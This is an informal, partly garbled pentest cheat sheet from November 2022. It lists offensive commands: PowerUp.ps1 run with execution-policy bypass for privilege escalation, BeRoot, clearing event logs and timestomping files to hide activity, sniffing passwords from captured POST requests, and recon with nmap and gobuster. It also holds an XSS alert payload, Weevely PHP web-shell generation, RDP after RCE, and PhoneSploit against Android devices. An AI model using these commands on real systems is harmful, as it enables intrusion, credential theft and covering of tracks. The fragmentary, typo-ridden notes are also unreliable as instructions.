xtra_pins_to_pentest_checklists_20222

To be added

25 November 2022 15:35

Execute powershell scripts to get vnc and to bypass AV detection and to get privilage escalation: Upload <path> PowerUp.ps1

Powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"

Upload Beroot.exe to get highest Privilage

Clearev used tyo clear the logs

Timestamp secrect.txt -m <"modified Value in the same format">

Tcpdump -nvx port 8888 -i <interface mode> // execute this script on recieve side to monitore the network

To look for logged in user passwords on pcap file http:request.method=POST

OR

Click edit-->Find packet-->[Packt details NAME UTF/8 ACII STRING PWD ] Expand HTML form URL Encode to gbet the details

ANTI DOS Guardian can be used

Ghost eye foortprinting tool nc -vv <url> 80

Telnet <url> 80

Nmap -sV --script=http-enum <Domain>

Nmap --script hostmap-bfk --script-args hostmap-bfk-prefix=hostmap -<url>

<

<script>alert(1)</script> Whatweb<domain> Nmap -T4 -A -v <Domain>

After performing RCE do RDP using added credentials

Directory Listing:

Gobuster dir -a <http://<url>> -w <Wordlists.txt> During login bruteforce use clusterbomb attack Weevely generate <Pass> <Path.php>

Weevely <path.php> <Pass>

Android

Apt-get install adb Git clone phonesploit 3

<type IP> 4

Exit (To exit from the shell)